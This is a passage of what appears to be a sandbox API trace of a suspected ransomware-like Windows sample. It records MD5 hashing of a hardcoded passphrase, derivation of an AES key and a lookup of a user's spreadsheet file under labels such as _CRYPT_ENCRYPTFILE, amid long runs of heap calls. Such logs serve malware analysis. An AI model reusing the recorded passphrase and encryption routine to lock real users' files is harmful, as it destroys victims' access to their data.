(in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0076.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0076.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0076.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0076.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0076.139] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9d88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0076.139] CloseHandle (hObject=0x258) returned 1 [0076.139] FreeLibrary (hLibModule=0x772d0000) returned 1 [0076.139] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0076.139] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\CzDg7AgA6_wtvH.ods", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e188980, ftCreationTime.dwHighDateTime=0x1d5e2d5, ftLastAccessTime.dwLowDateTime=0x869ba5c0, ftLastAccessTime.dwHighDateTime=0x1d5e984, ftLastWriteTime.dwLowDateTime=0x869ba5c0, ftLastWriteTime.dwHighDateTime=0x1d5e984, nFileSizeHigh=0x0, nFileSizeLow=0x1149, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="CzDg7AgA6_wtvH.ods", cAlternateFileName="CZDG7A~1.ODS")) returned 0x41ac2c0 [0076.140] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0076.140] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.140] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.140] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0076.140] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.140] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0076.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0076.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0076.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0076.141] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0076.141] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0076.146] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.146] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0076.146] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.146] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.146] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.146] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.146] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.146] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0076.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca508, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0076.146] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0076.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0076.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0076.147] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0076.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0076.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0076.147] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.147] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0076.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca7f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0076.147] CryptHashData (hHash=0x41abfc0, pbData=0x17e2788, dwDataLen=0x22, dwFlags=0x1) returned 1 [0076.147] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.147] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.147] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0076.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca5b0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0076.147] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41abfc0, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac6c0) returned 1 [0076.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0076.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0076.149] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0076.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca790 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa18 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8e0 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9d0 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa30 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0076.150] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca958 [0076.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0076.151] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0076.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0076.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0076.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0076.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0076.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0076.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0076.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0076.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0076.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0076.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0076.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0076.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0076.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0076.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0076.151] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0076.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0076.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0076.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0076.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0076.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0076.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0076.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0076.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0076.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0076.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796f08 [0076.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0076.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0076.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0076.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0076.152] CryptDestroyHash (hHash=0x41abfc0) returned 1 [0076.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0076.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0076.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0076.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0076.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0076.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0076.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0076.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0076.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0076.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0076.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0076.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0076.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0076.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0076.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0076.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0076.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0076.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0076.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0076.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0076.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0076.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0076.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0076.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0076.154] HeapFree (in: hHeap=0x1780000, 